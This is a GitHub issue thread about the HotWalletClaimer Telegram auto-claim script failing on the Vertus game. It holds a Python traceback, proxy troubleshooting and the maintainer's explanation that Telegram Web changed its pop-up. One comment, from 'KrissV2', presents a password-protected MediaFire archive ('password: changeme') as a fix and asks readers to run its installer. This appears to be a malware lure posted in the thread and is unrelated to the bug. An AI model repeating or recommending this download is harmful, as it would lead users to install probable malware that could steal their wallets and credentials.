### ISSUE TITLE
Bug: [Vertus issue]

### ISSUE THREAD

**Issue by bscongluanbui** [thebrumby/HotWalletClaimer#206]
**Describe the Bug (required):**
It's run infinity

**Have you followed the [troubleshooting guide](https://github.com/thebrumby/HotWalletClaimer/issues/166) (required):**
Yes

**Steps to Reproduce (required):**
HROME DRIVER INITIALISED: Try not to exit the script before it detaches.
40|Vertus: | Step 100 - Attempting to verify if we are logged in (hopefully QR code is not present).
40|Vertus: | Step 101 - Attempting to check for the start button (should not be present)...
40|Vertus: | Step 102 - Attempting to open a link for the app: //div[@class='reply-markup-row']//span[contains(text(),'Open app') or contains(text(), 'Play')]...
40|Vertus: | Step 103 - Attempting to click the 'Launch' button (probably not present)...
40|Vertus: | Step 104 - Attempting to switch to the app's iFrame within 'popup-body'...
40|Vertus: | Step 105 - Attempting to collect the Island bonus (may not be present)...

40|Vertus:a4  | Step 106 - Attempting to collect the Storage link...
40|Vertus:a4  | Step 109 - Attempting to get the pre-claim wait timer...
40|Vertus:a4  | Traceback (most recent call last):
40|Vertus:a4  |   File "/usr/src/app/games/vertus.py", line 331, in <module>
40|Vertus:a4  |     main()
40|Vertus:a4  |   File "/usr/src/app/games/vertus.py", line 328, in main
40|Vertus:a4  |     claimer.run()
40|Vertus:a4  |   File "/usr/src/app/games/claimer.py", line 159, in run
40|Vertus:a4  |     wait_time = self.full_claim()
40|Vertus:a4  |                 ^^^^^^^^^^^^^^^^^
40|Vertus:a4  |   File "/usr/src/app/games/vertus.py", line 172, in full_claim
40|Vertus:a4  |     matches = re.findall(r'(\d+)([hm])', wait_time_text)
40|Vertus:a4  |               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
40|Vertus:a4  |   File "/usr/lib/python3.12/re/__init__.py", line 217, in findall
40|Vertus:a4  |     return _compile(pattern, flags).findall(string)
40|Vertus:a4  |            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
40|Vertus:a4  | TypeError: expected string or bytes-like object, got 'bool'
40|Vertus:a4  | Initialising the Vertus: Wallet Auto-claim Python Script - Good Luck!
 CHROME DRIVER INITIALISED: Try not to exit the script before it detaches.

**Expected Behavior (required):**
maybe the http proxy error?
**Screenshots or Logs:**
![image](https://github.com/user-attachments/assets/bf111075-ea67-4d36-ac14-e912b7d49367)

**Comment by bscongluanbui** [comment]
Its seem all the app not working

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by esckobar** [comment]
Такая же ситуация и с HOT

**Comment by esckobar** [comment]
![5375417159292934655](https://github.com/user-attachments/assets/07bd0c4a-fb09-4c0a-bd7a-ecfdd6df6e5d)

**Comment by bscongluanbui** [comment]
HI and when I want to add the new telegram session. It's not find the country field
![image](https://github.com/user-attachments/assets/9ec9207e-eb9e-481f-a661-ad540ccf6463)

**Comment by thebrumby** [comment]
If you looked at TG web you'd know

**Comment by bscongluanbui** [comment]
HI Phil, maybe the proxy is the problem? When I add session without proxy it success but when using proxy, It cannot show qr or number

**Comment by thebrumby** [comment]
> HI Phil, maybe the proxy is the problem? When I add session without proxy it success but when using proxy, It cannot show qr or number

In this case, I think not. Telegram web have changed the pop-up where the game appears. I've pushed an early update and started testing - everyone will need to update their scripts from the repository, or at least claimer.py

**Comment by bscongluanbui** [comment]
> > HI Phil, maybe the proxy is the problem? When I add session without proxy it success but when using proxy, It cannot show qr or number
> 
> In this case, I think not. Telegram web have changed the pop-up where the game appears. I've pushed an early update and started testing - everyone will need to update their scripts from the repository, or at least claimer.py

Hi. When I using the original proxy, I can create the Telegram session, But if I using proxy (test ok when add), It's not show qr code or the country number
![image](https://github.com/user-attachments/assets/c87a0d05-a09c-4dcd-90fe-29804306eb1d)
![image](https://github.com/user-attachments/assets/0da51958-a6de-42dc-8415-2a80b4740423)

**Comment by thebrumby** [comment]
> > > HI Phil, maybe the proxy is the problem? When I add session without proxy it success but when using proxy, It cannot show qr or number
> > 
> > 
> > In this case, I think not. Telegram web have changed the pop-up where the game appears. I've pushed an early update and started testing - everyone will need to update their scripts from the repository, or at least claimer.py
> 
> Hi. When I using the original proxy, I can create the Telegram session, But if I using proxy (test ok when add), It's not show qr code or the country number ![image](https://private-user-images.githubusercontent.com/102287592/363404130-57d4d1a6-c4d5-4c52-9eac-68fd5426fac1.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjUwOTkyNzcsIm5iZiI6MTcyNTA5ODk3NywicGF0aCI6Ii8xMDIyODc1OTIvMzYzNDA0MTMwLTU3ZDRkMWE2LWM0ZDUtNGM1Mi05ZWFjLTY4ZmQ1NDI2ZmFjMS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODMxJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgzMVQxMDA5MzdaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xODNjMTI3OTExZGM4ZDcwNDhlNjNmNjY2NDVlZjRhOWM3MTJlNWFjYzFlY2VkYjJkZjM0ZWU3OTFlNjQ0MzAzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.M5aVpEPBxMSTrHQ1qpZOUwlQzoZYg_2v_lgyRp8rYLo) ![image](https://private-user-images.githubusercontent.com/102287592/363404084-0da51958-a6de-42dc-8415-2a80b4740423.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjUwOTkyNzcsIm5iZiI6MTcyNTA5ODk3NywicGF0aCI6Ii8xMDIyODc1OTIvMzYzNDA0MDg0LTBkYTUxOTU4LWE2ZGUtNDJkYy04NDE1LTJhODBiNDc0MDQyMy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODMxJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgzMVQxMDA5MzdaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT04OTRhYTg2NjkyZTI1NzViNGVkZTIzZWJiZDg5ZTkwYzlhOGE0NjBlMmE2MWIwMDk1NmJlYzFkNWE2MmY2NDMzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.Q6W2MYAQ1fdNo96q3D2TW7jq7JTCsrnvwYPzkFikI5E)

The connection test is done through the Python library Requests, which might default to your standard connection if the proxy fails and gives a false positive. I use Smart Proxy for testing and the system works fine, but I have no control over what proxy the end-user uses.
